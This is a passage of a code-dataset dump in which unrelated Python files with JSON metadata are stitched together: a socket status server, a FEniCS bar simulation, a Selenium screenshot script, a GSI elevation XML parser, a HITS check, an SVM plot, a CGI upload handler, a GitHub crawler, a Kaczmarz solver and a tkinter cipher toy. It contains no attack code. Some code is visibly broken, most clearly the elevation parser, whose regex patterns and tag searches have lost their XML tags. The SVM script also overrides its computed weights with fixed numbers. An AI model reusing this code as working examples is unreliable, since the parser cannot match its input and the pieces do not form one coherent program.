Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n barLength - Optional : character length of bar (Int)\n \"\"\"\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percents = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n bar = '█' * filledLength + '-' * (barLength - filledLength)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix)),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\ndef start_bar():\n # \n # Sample Usage\n # \n # make a list\n items = list(range(0, 10))\n i = 0\n l = len(items)\n \n # Initial call to print 0% progress\n printProgress(i, l, prefix = 'Progress:', suffix = 'Complete', barLength = 50)\n for item in items:\n # Do stuff...\n sleep(1)\n # Update Progress Bar\n i += 1\n printProgress(i, l, prefix = 'Progress:', suffix = 'Complete', barLength = 
50)\n\n\n\n#-------------------------------------------------------------------------------\n# THREAD TO SHOW TEXT ABOUT WAITING FOR NEW REQUEST\n#-------------------------------------------------------------------------------\n\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n\n def run(self):\n show()\ndef show():\n os.system('clear')\n global exitFlag\n while exitFlag:\n time.sleep(1)\n print (\"Waiting for new request... \")\n time.sleep(1)\n os.system('clear')\n accept(ip,port)\n\ndef accept(_ip, _port):\n print('Accepting connection from ' + _ip + ':' + _port+ ' Time: '+ time.ctime())\n\n#-------------------------------------------------------------------------------\n# NGINX STATUS SEND TO CLIENT\n#-------------------------------------------------------------------------------\ndef nginx_status_send(conn):\n p = os.popen(\"sudo service nginx status | grep '[A]ctive' | awk '{print $2}'\",\"r\")\n out = ''\n while 1:\n line = p.readline()\n if not line: break\n out+=line\n\n # print(\"Result of processing {} is: {}\".format(input_from_client, out))\n\n vysl = out.encode(\"utf8\") # encode the result string\n conn.sendall(vysl) # send it to client\n \n#-------------------------------------------------------------------------------\n# QUIT SEND TO CLIENT\n#-------------------------------------------------------------------------------\ndef quit_send(conn):\n end_message = \"stop\"\n encode = end_message.encode(\"utf8\") # encode the result string\n conn.sendall(encode) # send it to client\n conn.close() # close connection\n print('Connection ' + ip + ':' + port + \" ended\")\n time.sleep(5)\n\n # Create new threads\n thread1 = myThread(1, \"Thread-1\", 1)\n\n # Start new Threads\n thread1.start()\n global exitFlag\n exitFlag = 1\n#-------------------------------------------------------------------------------\n# DATE SEND TO CLIENT\n#-------------------------------------------------------------------------------\n\ndef date_send(conn):\n p = os.popen('date',\"r\")\n out = ''\n while 1:\n line = p.readline()\n if not line: break\n out+=line\n # print(\"Result of processing {} is: {}\".format(input_from_client, out))\n\n vysl = out.encode(\"utf8\") # encode the result string\n conn.sendall(vysl) # send it to client\n\n\n#-------------------------------------------------------------------------------------\n# RESPOND TO CLIENT AND CLOSE TE CONNECTION AND RUN 'WAITING' TEXT\n#-------------------------------------------------------------------------------------\n\ndef client_thread(conn, ip, port, MAX_BUFFER_SIZE = 4096):\n \n welcome_message = \"What do you want to do?? \\n Select:\\n 'N' => Nginx status. \\n 'D' => Actual Date. \\n 'Q' => Quit connect. 
\\n : \"\n encode = welcome_message.encode(\"utf8\") # encode the result string\n conn.sendall(encode) # send it to client\n\n while True:\n\n # the input is in bytes, so decode it\n input_from_client_bytes = conn.recv(MAX_BUFFER_SIZE)\n\n # MAX_BUFFER_SIZE is how big the message can be\n # this is test if it's sufficiently big\n siz = sys.getsizeof(input_from_client_bytes)\n if siz >= MAX_BUFFER_SIZE:\n print(\"The length of input is probably too long: {}\".format(siz))\n\n # decode input and strip the end of line\n input_from_client = input_from_client_bytes.decode(\"utf8\").rstrip()\n if ((input_from_client == 'n') | (input_from_client == 'N')):\n nginx_status_send(conn)\n elif ((input_from_client == 'q') | (input_from_client == 'Q')):\n quit_send(conn)\n break\n elif ((input_from_client == 'd') | (input_from_client == 'D')):\n date_send(conn)\n else:\n message = \"\\n Wrong command!!! \\n\"\n encode = message.encode(\"utf8\") # encode the result string\n conn.sendall(encode) # send it to client\n time.sleep(1)\n\n\n ######## start progress bar #####\n # start_bar() <-----\n#--------------------------------------------------------------------------\n# START SERVER, CREATE SOCKET, BIND AND START LISTENING\n#--------------------------------------------------------------------------\ndef start_server():\n\n import socket\n soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # this is for easy starting/killing the app\n soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n print('Socket created')\n\n try:\n #SOCKET IP AND PORT\n soc.bind((IP_ADDRES, 12345))\n\n print('Socket bind complete')\n except socket.error as msg:\n import sys\n print('Bind failed. Error : ' + str(sys.exc_info()))\n sys.exit()\n\n #Start listening on socket\n soc.listen(10)\n print('Socket now listening')\n\n # this will make an infinite loop needed for \n # not reseting server for every client\n while True: \n conn, addr = soc.accept()\n global ip, port, exitFlag\n ip, port = str(addr[0]), str(addr[1])\n exitFlag = 0\n if (port == '12345'):\n accept(ip, port)\n try:\n Thread(target=client_thread, args=(conn, ip, port)).start()\n except:\n print(\"Terible error!\")\n import traceback\n traceback.print_exc()\n soc.close()\n\n\nprint (\"Start : %s\" % time.ctime())\nstart_server() \n \n\n","sub_path":"Python_server/Python_server/Python_server.py","file_name":"Python_server.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339332755","text":"from __future__ import print_function\r\nfrom fenics import *\r\nfrom ufl import nabla_div\r\nimport math\r\n\r\n#==============================================================\r\n#\tDimensional parameters\r\n#==============================================================\r\nlength = 1.0\r\nW = 0.2\r\nH = 0.2\r\n\r\nmu = 300e6\r\nrho = 5e3\r\nlambda_ = 400e6\r\n\r\ntraction_applied = -1e4\r\n\r\n\r\n#==============================================================\r\n#\tDimensionless parameters\r\n#==============================================================\r\nyoungs = (mu*(3.0*lambda_+2.0*mu))/(lambda_+mu)\r\nbar_speed = math.sqrt(youngs/rho)\r\n\r\nl_nd = length/length\r\nw_nd = W/length\r\nh_nd = H/length\r\n\r\nt_char = length/bar_speed\r\nt = 0\r\nt_i = 0.5\r\ndt = 0.1\r\nnum_steps = 100\r\n\r\nmu_nd = mu/youngs\r\nlambda_nd = lambda_/youngs\r\n\r\ntraction_nd = traction_applied/youngs\r\n\r\n#============================================================\r\nmesh = 
BoxMesh(Point(0,0,0),Point(l_nd,w_nd,h_nd),20,6,6)\r\nV = VectorFunctionSpace(mesh,'P',1)\r\n\r\ntol = 1E-14\r\nboundary_left = 'near(x[0],0)'\r\nbc_left = DirichletBC(V,Constant((0,0,0)),boundary_left)\r\n\r\n\r\nu_n = interpolate(Constant((0.0,0.0,0.0)),V)\r\nu_n_1 = interpolate(Constant((0.0,0.0,0.0)),V)\r\n\r\nT_n = Expression(('near(x[0],l) ? (t <= t_i ? A : 0.0) : 0.0','0.0','0.0'), degree=1, l=l_nd, A=traction_nd, t=t, t_i=t_i)\r\n\r\ndef epsilon(u):\r\n\treturn 0.5*(nabla_grad(u) + nabla_grad(u).T)\r\n\r\ndef sigma(u):\r\n\treturn lambda_nd*nabla_div(u)*Identity(d) + mu_nd*(epsilon(u) + epsilon(u).T)\r\n\r\nu = TrialFunction(V)\r\nd = u.geometric_dimension()\r\nv = TestFunction(V)\r\n\r\nf = Constant((0,0,0))\r\n\r\nF = (dt*dt)*inner(sigma(u),epsilon(v))*dx + dot(u,v)*dx - (dt*dt)*dot(f,v)*dx - (dt*dt)*dot (T_n,v)*ds - 2.0*dot(u_n,v)*dx + dot(u_n_1,v)*dx\r\na,L = lhs(F), rhs(F)\r\n\r\nxdmffile_u = XDMFFile('results/solution.xdmf')\r\nxdmffile_s = XDMFFile('results/stress.xdmf')\r\n\r\nu = Function(V)\r\n\r\n\r\nfor n in range(num_steps):\r\n\tprint(\"time = %.2f\" % t)\r\n\tprint(\"It's tensile time\")\r\n\tprint(\"Ohhowoheohoweheoh\")\r\n\tT_n.t = t\r\n\tsolve(a == L, u, bc_left)\r\n\r\n\txdmffile_u.write(u*length,t)\r\n\tW = TensorFunctionSpace(mesh, \"Lagrange\", 1)\r\n\tstress = lambda_*nabla_div(u)*Identity(d) + mu*(epsilon(u) + epsilon(u).T)\r\n\txdmffile_s.write(project(stress,W),t)\r\n\r\n\tt+=dt\r\n\tu_n_1.assign(u_n)\r\n\tu_n.assign(u)","sub_path":"Lab/2019.02.20 Lab/tensile_time.py","file_name":"tensile_time.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"238998978","text":"from selenium import webdriver\r\n\r\ndriver=webdriver.Chrome(executable_path=\"C:\\Drivers\\chromedriver_win32\\chromedriver.exe\")\r\n\r\ndriver.get(\"https://phptravels.com/demo/\") #opens up the website\r\n\r\n#driver.save_screenshot(\"C:\\Screenshot\\homePage.png\") #capturing the screenshot of the specified page and saving it to the target location #accepts jpg, png etc extension\r\n\r\ndriver.get_screenshot_as_file(\"C:\\Screenshot\\homePage2.png\") #capturing the screenshot and saving it to the target location #this command only accepts png extension\r\n\r\ndriver.close()\r\n\r\n","sub_path":"captureScreen.py","file_name":"captureScreen.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"422399907","text":"# please download elevation model from https://fgd.gsi.go.jp/download/menu.php (login required)\n# code based on https://www.gis-py.com/entry/2016/01/10/163027\n\nimport re\nimport numpy as np\nfrom os.path import join,relpath\nfrom glob import glob\nimport shelve\n\ndef generate_elevation():\n elevation_data = []\n \n #XMLを格納するフォルダ\n path = \"./DL\"\n #ファイル名取得\n files = [relpath(x,path) for x in glob(join(path,'**/*.xml'), recursive=True)]\n \n # 検索パターンをコンパイル\n r1 = re.compile(\"(.+) (.+)\")\n r2 = re.compile(\"(.+) (.+)\")\n r3 = re.compile(\"(.+) (.+)\")\n r4 = re.compile(\"(.+) (.+)\")\n \n for index_files, fl in enumerate(files):\n xmlFile = join(path,fl)\n #XMLを開く\n with open(xmlFile, \"r\", encoding = \"utf-8\") as f:\n for ln in f:\n m = r1.search(ln)\n #検索パターンとマッチした場合、スタートポジションを格納\n if m != None:\n lry = float(m.group(1))\n ulx = float(m.group(2))\n break\n \n \n for ln in f:\n m = r2.search(ln)\n \n #検索パターンとマッチした場合、スタートポジションを格納\n if m != None:\n uly = float(m.group(1))\n lrx = 
float(m.group(2))\n break\n \n \n for ln in f:\n m = r3.search(ln)\n #検索パターンとマッチした場合、縦横の領域を格納\n if m != None:\n xlen = int(m.group(1)) + 1\n ylen = int(m.group(2)) + 1\n break\n \n startx = starty = 0\n \n for ln in f:\n m = r4.search(ln)\n #検索パターンとマッチした場合、スタートポジションを格納\n if m != None:\n startx = int(m.group(1))\n starty = int(m.group(2))\n break\n \n #numpy用にデータを格納しておく\n with open(xmlFile, \"r\", encoding = \"utf-8\") as f:\n src_document = f.read()\n lines = src_document.split(\"\\n\")\n num_lines = len(lines)\n l1 = None\n l2 = None\n for i in range(num_lines):\n if lines[i].find(\"\") != -1:\n l1 = i + 1\n break\n for i in range(num_lines - 1, -1, -1):\n if lines[i].find(\"\") != -1:\n l2 = i - 1\n break\n \n #セルのサイズを算出\n psize_x = (lrx - ulx) / xlen\n psize_y = (uly - lry) / ylen\n \n narray = np.empty((ylen, xlen), np.float32)\n narray.fill(0)\n \n num_tuples = l2 - l1 + 1\n \n #スタートポジションを算出\n start_pos = starty*xlen + startx\n \n i = 0\n sx = startx\n \n #標高を格納\n for y in range(starty, ylen):\n for x in range(sx, xlen):\n if i < num_tuples:\n vals = lines[i + l1].split(\",\")\n if len(vals) == 2 and vals[1].find(\"-99\") == -1:\n narray[y][x] = float(vals[1])\n i += 1\n else:\n break\n if i == num_tuples: break\n sx = 0\n \n elevation_data.append([ulx, uly, psize_x, psize_y, narray])\n print(\"%s/%s startx%s starty%s sizex%s sizey%s\" % (index_files, len(files) - 1, ulx, uly, psize_x, psize_y))\n \n shel = shelve.open('elevation.shel')\n shel['elevation'] = elevation_data\n shel.close()\n","sub_path":"elevation.py","file_name":"elevation.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"340471747","text":"import networkx as nx\nimport numpy as np\nimport sys\nfrom scipy.io import mmread\nfrom scipy.sparse import coo_matrix\nnp.set_printoptions(threshold=sys.maxsize)\n\nif len(sys.argv) != 2:\n print(\"Usage: python3 ./hits.py \")\n exit()\n\ngraph_coo = mmread(sys.argv[1])\nprint(\"Loading COO matrix\")\nprint(graph_coo.nnz, \" edges\")\n\ngraph_nx = nx.DiGraph(graph_coo)\n\nprint(\"Creating NetworkX Graph\")\nprint(\"NetworkX is Directed: \", nx.is_directed(graph_nx))\nprint(\"NetworkX Graph has \", graph_nx.number_of_edges(), \" edges\")\n\nmax_iter = 10000\ntol = 1e-6\nhubs_nx, auths_nx = nx.hits(graph_nx, max_iter, tol, normalized=True)\n\n# Numpy implementation\nhrank = np.zeros((graph_coo.shape[0], 1))\narank = np.zeros((graph_coo.shape[0], 1))\n\nhrank += 1/graph_coo.shape[0]\narank += 1/graph_coo.shape[0]\n\nfor _ in range(0, max_iter):\n hlast = hrank\n alast = arank\n hrank = np.zeros((graph_coo.shape[0], 1))\n arank = np.zeros((graph_coo.shape[0], 1))\n\n for edge in range(0, graph_coo.nnz):\n src = int(graph_coo.row[edge])\n dest = int(graph_coo.col[edge])\n arank[dest] += hlast[src]\n hrank[src] += alast[dest]\n\n # Normalize\n hrank = hrank / np.max(hrank)\n arank = arank / np.max(arank)\n\n err = np.sum(np.absolute(hrank-hlast))\n if err < tol:\n break\n\nhrank = hrank / np.linalg.norm(hrank, ord=1)\narank = arank / np.linalg.norm(arank, ord=1)\n\nhubs_np = {}\nauths_np = {}\n\nfor i in range(0, graph_coo.shape[0]):\n hubs_np[i] = hrank[i]\n auths_np[i] = arank[i]\n\nprint(\"Hubs: \")\nfor key, val in sorted(hubs_nx.items(), key=lambda x: x[1], reverse=True):\n print(key, val, hubs_nx[key])\nprint(\"Authorities: \")\nfor key, val in sorted(auths_nx.items(), key=lambda x: x[1], reverse=True):\n print(key, val, 
auths_nx[key])","sub_path":"examples/hits/hits.py","file_name":"hits.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"424281144","text":"import numpy as np\nimport pandas as pd\nimport random as rand\nimport math\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom scipy.stats import multivariate_normal\nfrom sys import maxint\nfrom sklearn import svm\n\nSV = svm.SVC()\n\nx1= [3,2,4,1,2,4,4]\nx2= [4,2,4,4,1,3,1]\nalpha=[0,1,1,0,1,1,0]\nclify=[1,1,1,1,-1,-1,-1]\nred = \"red\"\nblue = \"blue\" \nweights=np.zeros(2)\n \ncolor=[red,red,red,red,blue,blue,blue]\ndata = {'x':x1,'y':x2,'labelColor':color, 'class':clify}\ndf = pd.DataFrame(data)\nprint(df)\nline = SV.fit(df.ix[:,['x','y']], df['labelColor'])\nprint(line.support_)\nfor i in range(len(x1)):\n weights[0]=weights[0]+(clify[i]*(alpha[i]*x1[i]))\n weights[1]=weights[1]+(clify[i]*(alpha[i]*x2[i]))\nweights[0] =2\nweights[1] = 1.5\n\nb = -1*(x1[6]*weights[0]+x2[6]*weights[1]) \nb = -1.5\nprint(weights)\nprint(b)\n\n\nplt.scatter(df['x'], df['y'], c=df[\"labelColor\"])\nxs = [0,1,2,3,4]\nys = []\nfor i in range(len(xs)):\n ys.append((1/weights[1])*(xs[i]*weights[0])+b)\n \nplt.plot(xs,ys)\nplt.show()","sub_path":"hw3/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354130638","text":"#!/usr/bin/env python3\nimport cgi, os\nfrom os import environ\nimport sqlite3, http.cookies\nfrom common import *\nimport cgitb; cgitb.enable() # activates a special exception handler \n # that'll display reports in browser\n\ncgitb.enable()\n\ncookstr = environ.get('HTTP_COOKIE')\ncookies = http.cookies.SimpleCookie(cookstr)\ncookies.load(cookstr)\ntry:\n sidcook = cookies['sid'].value\n if auth(sidcook) == True:\n form = cgi.FieldStorage(keep_blank_values=True) # to get at submitted data.\n # keep_bla... 
- to keep ignored empty form field\n fileitem = form['file'] # a nested FieldStorage instance holds the file\n title = form.getvalue(\"title\")\n selfname = fileitem.filename\n upload(fileitem, title, selfname)\n else:\n redirect(SLOGIN)\nexcept KeyError:\n redirect(SLOGIN)","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"5650503","text":"from github import Github\r\nimport requests, csv, json\r\n\r\n#Limitando tanto os usuários quanto os repositórios, devido ao limite de requisições da API do GitHub.\r\n#h = Github()\r\n#repo = h.get_user(\"Microsoft\").get_repo(\"vscode\").contributors_url\r\nr = requests.get(\"https://api.github.com/repos/Microsoft/vscode/contributors?page=1&per_page=10\")\r\nwith open(\"crawlerContributorsVSCODE\", 'w') as f:\r\n writeit = csv.writer(f, delimiter=',', lineterminator='\\n')\r\n repoJSON = json.loads(r.text)\r\n for item in repoJSON:\r\n pk = item['id']\r\n name = item['login']\r\n output = str(pk) + \",\" + name\r\n writeit.writerow([pk] + [name])\r\n print(output)\r\n","sub_path":"CrawlerContributors.py","file_name":"CrawlerContributors.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"467572461","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport numpy as np\nfrom astropy.time import Time, TimeDelta\nfrom ..utils.time import TIME_REF_FERMI\n\n__all__ = [\n 'plot_fermi_3fgl_light_curve',\n]\n\n\ndef plot_time_difference_distribution(time, ax=None):\n \"\"\"Plot event time difference distribution.\n\n Parameters\n ----------\n time : `~astropy.time.Time`\n Event times (must be sorted)\n ax : `~matplotlib.axes.Axes` or None\n Axes\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axes\n \"\"\"\n import matplotlib.pyplot as plt\n\n if ax is None:\n ax = plt.gcf()\n\n td = time[1:] - time[:-1]\n\n # TODO: implement!\n raise NotImplementedError\n\n\ndef plot_fermi_3fgl_light_curve(source_name, time_start=None, time_end=None, ax=None):\n \"\"\"Plot flux as a function of time for a fermi 3FGL object.\n\n Parameters\n ----------\n source_name : str\n The 3FGL catalog name of the object to plot\n time_start : `~astropy.time.Time` or str or None\n Light curve start time. If None, use the earliest time in the catalog.\n time_end : `~astropy.time.Time` or str or None\n Light curve end time. If None, use the latest time in the catalog.\n ax : `~matplotlib.axes.Axes` or None\n Axes\n\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axes\n\n Examples\n --------\n Plot a 3FGL lightcurve:\n\n .. 
plot::\n :include-source:\n\n from gammapy.time import plot_fermi_3fgl_light_curve\n plot_fermi_3fgl_light_curve('3FGL J0349.9-2102',\n time_start='2010-01-01',\n time_end='2015-02-02')\n\n import matplotlib.pyplot as plt\n plt.show()\n \"\"\"\n from ..catalog import fetch_fermi_catalog\n import matplotlib.pyplot as plt\n import matplotlib.dates as mdates\n\n ax = plt.gca() if ax is None else ax\n\n if time_start is None:\n time_start = Time('2008-08-02T00:33:19')\n else:\n time_start = Time(time_start)\n\n if time_end is None:\n time_end = Time('2012-07-31T22:45:47')\n else:\n time_end = Time(time_end)\n\n fermi_met_start = (time_start - TIME_REF_FERMI).sec\n\n fermi_met_end = (time_end - TIME_REF_FERMI).sec\n\n fermi_cat = fetch_fermi_catalog('3FGL')\n\n catalog_index = np.where(fermi_cat[1].data['Source_Name'] == source_name)[0][0]\n\n hist_start = fermi_cat[3].data['Hist_Start']\n time_index_start = np.where(hist_start >= fermi_met_start)[0][0]\n\n # The final entry is the end of the last bin, so no off by one error\n time_index_end = np.where(hist_start <= fermi_met_end)[0][-1] + 1\n\n time_start = hist_start[time_index_start: time_index_end]\n time_end = np.roll(time_start, -1)\n\n time_diff = 0.5 * (time_end - time_start)\n\n # Trim because there is one more bin edge than there is bin mid point\n time_diff = time_diff[0:-1]\n\n # Midpoints of each bin.\n time_mid = time_start[0:-1] + time_diff\n\n cat_row = fermi_cat[1].data[catalog_index]\n\n flux_history = cat_row['Flux_History'][time_index_start: time_index_end]\n\n flux_history_lower_bound = cat_row['Unc_Flux_History'][time_index_start: time_index_end, 0]\n flux_history_upper_bound = cat_row['Unc_Flux_History'][time_index_start: time_index_end, 1]\n flux_history_lower_bound = abs(flux_history_lower_bound)\n\n time_mid = (TIME_REF_FERMI + TimeDelta(time_mid, format='sec'))\n\n time_at_bin_start = time_mid - TimeDelta(time_diff, format='sec')\n\n time_at_bin_end = time_mid + TimeDelta(time_diff, format='sec')\n\n time_mid = time_mid.plot_date\n\n time_at_bin_start = time_at_bin_start.plot_date\n\n time_at_bin_end = time_at_bin_end.plot_date\n\n time_diff_at_bin_start = time_mid - time_at_bin_start\n\n time_diff_at_bin_end = time_at_bin_end - time_mid\n\n # Where a lower bound was recorded.\n idx1 = np.where(np.invert(np.isnan(flux_history_lower_bound)))\n\n # Where a lower bound was not recorded.\n idx2 = np.where(np.isnan(flux_history_lower_bound))\n\n # Where no lower bound was recorded, set to zero flux.\n flux_history_lower_bound[idx2] = flux_history[idx2]\n\n # Plot data points and upper limits.\n ax.errorbar(time_mid[idx1], flux_history[idx1],\n yerr=(flux_history_lower_bound[idx1], flux_history_upper_bound[idx1]),\n xerr=(time_diff_at_bin_start[idx1], time_diff_at_bin_end[idx1]),\n marker='o', elinewidth=1, linewidth=0, color='black')\n ax.errorbar(time_mid[idx2], flux_history[idx2],\n yerr=(flux_history_lower_bound[idx2], flux_history_upper_bound[idx2]),\n marker=None, elinewidth=1, linewidth=0, color='black')\n ax.scatter(time_mid[idx2], (flux_history[idx2] + flux_history_upper_bound[idx2]),\n marker='v', color='black')\n ax.set_xlabel('Date')\n ax.set_ylabel('Flux (ph/cm^2/s)')\n ax.set_ylim(ymin=0)\n ax.xaxis_date()\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%m/%Y'))\n ax.xaxis.set_major_locator(mdates.MonthLocator(interval=6))\n ax.figure.autofmt_xdate()\n\n return 
ax\n","sub_path":"gammapy/time/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"279809267","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matrix_generation.band_mat_with_cond_num import band_mat_with_cond_num\nfrom tqdm import tqdm \nfrom collections import deque\n\n\ndef lyusternick_kaczmarz(A,b): \n n = len(A)\n A = A.astype(float)\n b = b.astype(float)\n \n # Norm each equation\n normCoef = np.sqrt(np.sum(A ** 2, 1)).T\n A /= normCoef[:, None]\n b /= normCoef\n x = np.random.rand(n)\n\n # using 2nd norm below (change to suit your needs)\n disparity = lambda x: np.linalg.norm(b - np.dot(A, np.transpose(x)))/np.linalg.norm(b)\n cosVectAngle = lambda a, b: np.inner(a, b) / np.linalg.norm(a) / np.linalg.norm(b)\n resudial = lambda x: np.linalg.norm(A @ x - b) / np.linalg.norm(b)\n\n HPlane_Pnts = deque()\n lastVr = None\n q_last = None\n init_lastVr = False\n\n res = [disparity(x)]\n for _ in tqdm(range(200000)):\n\n if disparity(x) < 10**(-5):\n break\n\n for i in range(n):\n t = A[i] @ x - b[i]\n x -= A[i] * t\n res.append(resudial(x))\n\n if i == n - 1:\n HPlane_Pnts.append(np.copy(x))\n \n if len(HPlane_Pnts) > 3:\n HPlane_Pnts.popleft()\n\n prevVr = HPlane_Pnts[-2] - HPlane_Pnts[-3] if not init_lastVr else lastVr\n lastVr = HPlane_Pnts[-1] - HPlane_Pnts[-2]\n\n init_lastVr = True\n q_prev = q_last\n q_last = np.linalg.norm(lastVr) / np.linalg.norm(prevVr)\n\n if q_prev is not None and q_last != 1 and \\\n np.isclose(q_prev, q_last) and np.isclose(cosVectAngle(prevVr, lastVr), 1):\n # Lyusternik acceleration\n x = HPlane_Pnts[-1] + (HPlane_Pnts[-1] - HPlane_Pnts[-2]) / (1.0 - q_last)\n HPlane_Pnts.clear() \n\n res.append(resudial(x))\n return x, res\n\n\nif __name__ == \"__main__\":\n row, col = 6, 6\n half_band_size, ampl, cond = 3, 50, 50\n matrix = band_mat_with_cond_num(row, col, half_band_size, ampl, cond)\n \n true_sol = np.random.randn(row)\n b = matrix @ true_sol\n \n x_kacz, res_kacz = lyusternick_kaczmarz(matrix, b)\n print(x_kacz)\n print(np.allclose(x_kacz, true_sol, 10**(-2)))\n\n # plt.figure(figsize=(14,8))\n # plt.semilogy(res_kacz, label='Lyusternick Kaczmarz')\n # plt.title('Relative residuals', fontsize = 20)\n # plt.ylabel('Value', fontsize = 12)\n # plt.xlabel('Projection number', fontsize = 12)\n # plt.yscale('log')\n # plt.legend()\n # plt.show()","sub_path":"slove_linear_system/kaczmarz/lyusternick_kaczmarz.py","file_name":"lyusternick_kaczmarz.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"85475090","text":"import tkinter as tk\nfrom tkinter import *\nalphabet = [[[[\"a\",\"b\",\"c\"],[\"d\",\"e\",\"f\"]],[[\"g\",\"h\",\"i\"],[\"j\",\"k\",\"l\"]]],[[[\"m\",\"n\",\"o\"],[\"p\",\"q\",\"r\"]],[[\"s\",\"t\",\"u\"],[\"v\",\"w\",\"x\",\"y\",\"z\"]]]]\ngui = Tk()\n\ndef readme(s):\n\tinitial = s.split(\":\")\n\tprint(initial)\n\tv = []\n\tfor i in range(0,len(initial)):\n\t\tv.append(initial[i].split(\",\"))\n\tstarter = \"\";\n\tfor j in range(0, len(v)):\n\t\ttry:\n\t\t\tstarter = starter + alphabet[int(v[j][0])][int(v[j][1])][int(v[j][2])][int(v[j][3])]\n\t\texcept ValueError:\n\t\t\t\tbreak\n\treturn starter\n\ndef makeme(s):\n\tb = s.split(\" \")\n\tif len(b) < 1:\n\t\treturn \"You Should not waste power with such small words comrade!\"\n\tif len(s) is 26 or len(s) is 52:\n\t\treturn \"Nice Try Comrade!\"\n\ta = 
list(s.replace(\" \",\"\").lower())\n\td = \"\"\n\tfor i in range(0,len(a)):\n\t\tfor q in range(0,len(alphabet)): ## first value for code\n\t\t\tfor w in range(0,len(alphabet[q])):\n\t\t\t\tfor e in range(0,len(alphabet[q][w])):\n\t\t\t\t\tfor r in range(0,len(alphabet[q][w][e])):\n\t\t\t\t\t\tif a[i] is alphabet[q][w][e][r]:\n\t\t\t\t\t\t\td = d + str(q)+\",\"+str(w)+\",\"+str(e)+\",\"+str(r)+\":\"\n\treturn d\n\ndef printresult(s,txbox):\n\ttxbox.delete(\"1.0\",\"end-1c\")\n\ttxbox.insert(\"end-1c\",makeme(s))\n\treturn \"break\" \ndef main():\n\tgui.title(\"Super Secret Encoder!\") \n\tmain = Frame(gui, background=\"#ff0000\")\n\tmain.pack(fill=X)\n\tswidth = gui.winfo_screenwidth()\n\tsheight = gui.winfo_screenheight()\n\twindowsize = str((int(swidth*0.2))) + \"x\" + str((int(sheight*0.15))) \n\tgui.geometry(windowsize)\n\tLabel(main, text=\"Use this to encode our messages Comrade!\", bg=\"#ff0000\", fg=\"white\").grid(row=0,column=0)\n\tsubframe = Frame(main, background = \"#ff0000\")\n\tsubframe.grid(row=1,column=0)\n\tLabel(subframe, text=\"text to Encrypt: \", bg=\"#ff0000\", fg=\"white\").grid(row=0,column=0)\n\ttbox = Text(subframe, height = 1, width=30)\n\ttbox.bind('', lambda event: printresult(tbox.get(\"1.0\",\"end-1c\"),txbox))\n\ttbox.grid(row=0,column=1, padx=(10,10))\n\ttxbox = Text(main, height = 4, width = 50) \n\ten = Button(main, text=\"Encrypt\", command=lambda: printresult(tbox.get(\"1.0\", \"end-1c\"),txbox)).grid(row=2, column=0)\n\ttxbox.grid(row=3,column=0)\n\tgui.mainloop()\nmain()\n","sub_path":"Encrypter.py","file_name":"Encrypter.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"213640863","text":"# Your code here\nimport codecs\nprint(codecs.encode(\n \"Items: .vgrzf() zrgubq ba n qvpgvbanel zvtug or hfrshy. vg'f cbffvoyr sbe .fbeg() gb fbeg ba zhygvcyr xrlf ng bapr. artngvirf zvtug uryc jurer erirefr jba'g. lbh pna cevag n inevnoyr svryq jvqgu va na s-fgevat jvgu arfgrq oenprf, yvxr fb\", \"rot13\"))\n\n# start here\nwith open(\"robin.txt\") as f:\n words = f.read()\n\n# words = \"Round the rugged rock the freak freak freak insanity! 
